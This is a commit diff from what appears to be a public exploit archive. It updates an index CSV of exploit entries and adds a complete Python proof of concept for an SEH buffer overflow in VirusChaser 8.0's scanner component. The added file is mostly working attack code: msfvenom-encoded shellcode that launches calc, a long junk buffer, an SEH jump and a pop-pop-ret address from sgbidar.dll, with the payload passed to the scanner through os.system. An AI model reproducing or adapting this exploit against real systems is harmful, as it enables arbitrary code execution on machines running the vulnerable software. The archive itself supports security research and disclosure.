DB: 2017-04-17

1 new exploits Microsoft IIS - Malformed HTTP Request Denial of Service (cpp) Microsoft IIS - Malformed HTTP Request Denial of Service VirusChaser 8.0 - Buffer Overflow (SEH)
2017-04-17 05:01:16 +00:00 · 2017-04-17 05:01:16 +00:00 · 18df65f3e4
commit 18df65f3e4
parent b725a55435
2 changed files with 36 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -269,7 +269,7 @@ id,file,description,date,author,platform,type,port
 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0
 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0
 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0
-1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service (cpp)",2005-12-29,Lympex,windows,dos,0
+1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0
 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0
 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service",2006-01-10,kokanin,hardware,dos,0
 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0
@ -8918,6 +8918,7 @@ id,file,description,date,author,platform,type,port
 41710,platforms/windows/local/41710.rb,"HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)",2012-08-29,Metasploit,windows,local,0
 41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0
 41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0
 41887,platforms/windows/local/41887.txt,"VirusChaser 8.0 - Buffer Overflow (SEH)",2017-04-14,0x41Li,windows,local,0
 41886,platforms/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation",2017-04-15,"Nassim Asrir",linux,local,0
 41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
 41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
--- a/platforms/windows/local/41887.txt
+++ b/platforms/windows/local/41887.txt
@ -0,0 +1,34 @@
 # Exploit Title: Virus Chaser 8.0 - Scanner component, SEH Overflow
 # Date: 14 April 2017
 # Exploit Author: 0x41Li (0x41Li.D@gmail.com)
 # Vendor Homepage: https://www.viruschaser.com/
 # Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
 # Tested on: Windows 7 (Universal)
 import os
 from struct import pack
 ## msfvenom -a x86 --platform Windows -p windows/exec cmd=calc -b '\x00\x0d\x0a\x09\x22' -f c   # x86/shikata_ga_nai succeeded with size 216  ## BADCHARS = \x00\x0d\x0a\x09 AVOIDED = \x22 = " (Cut the buffer)
 shellcode= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
 			"\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83"
 			"\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe"
 			"\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd"
 			"\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5"
 			"\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e"
 			"\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f"
 			"\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77"
 			"\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e"
 			"\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40"
 			"\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70"
 			"\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc"
 			"\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17"
 			"\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8"
 			"\xae\xc2\x28\x4b\x32\x05")
 junk = "A"*688
 jmp ="\xeb\x0b\x41\x41"  ## JMP 0B 
 ret = pack('<L',0x10010c81)  #pop ECX #pop ESI #RET [sgbidar.dll]  (magic addr)
 nop = "\x90"*24
 payload = junk + jmp + ret + nop + shellcode
 print payload
 os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + payload + "\"")